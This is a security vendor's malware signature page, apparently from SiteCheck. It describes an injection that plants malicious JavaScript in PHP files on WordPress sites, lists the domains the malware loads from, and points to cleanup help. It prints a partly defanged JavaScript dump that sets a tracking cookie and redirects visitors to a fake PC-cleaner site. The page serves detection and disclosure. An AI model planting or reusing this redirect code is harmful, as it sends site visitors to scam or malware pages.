SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwmrobh3

malware-entry-mwmrobh3

Description: Code used to insert a malicious javascript on many
sites hosted at GoDaddy, Bluehost and many other hosting companies.

Loads malware from:
http://whereisdudescars.com/
http://nowisisdudescars.com/
http://sippa.dottasink.net/

It infects all PHP files, targeting specifically WordPress sites.

Clean up:: Run the following script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html or contact support@sucuri.net for help.

Malware dump (base 64 added to the .php files):


var name="google_pma_subs1718";
var value="1";
var maxage=(606024*20);
var gotourl=" http:// www3.pc-cleaner40. co.cc /?p=p52dcWpkb26Hnc3KbmNToKV1iqHWnG3LXsSYnGmZZmyaxA%3D%3D";
var allcookies = document.cookie;
var mycookie = allcookies.indexOf(name + "=");  

if (mycookie==-1) { if (navigator.cookieEnabled == true) { if (gotourl!="") { document.cookie=name + "=" + escape(value) + "; max-age=" + maxage + "; path=/";
location DOT replace(gotourl); } } }


<